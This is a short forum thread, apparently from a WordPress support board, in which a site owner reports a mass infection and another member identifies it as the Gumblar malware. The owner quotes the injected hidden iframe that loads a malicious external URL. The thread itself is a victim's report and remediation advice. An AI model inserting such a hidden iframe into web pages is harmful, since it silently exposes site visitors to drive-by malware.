calculust
Member
Posted 2 years ago #
There is a new virus that has hit a ton of website on the web...
http://www.theregister.co.uk/2009/05/30/mass_web_infection/
Mine is one of them. It somehow was able to add this code to my website...
<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
I have no idea how they did this. I checked my Template files and can't find anything.
Is this happening to anyone else? Is there a fix?
One of my blogs on WordPress (theme files are changed as well as some WordPress files) and also my PHPBB 3 forum. I had to clean up files manually, and after that changed all passwords and so far everything is fine.
Matt McInvale
Member
Posted 2 years ago #
Looks like Grumblar, no fun. It steals your FTP passwords and modifies files you have access to. Your best bet is recovering from a recent backup.
I've seen it hit index.php, wp-config.php and wp-includes/default-filters.php. Although it's possible that it can modify anything.
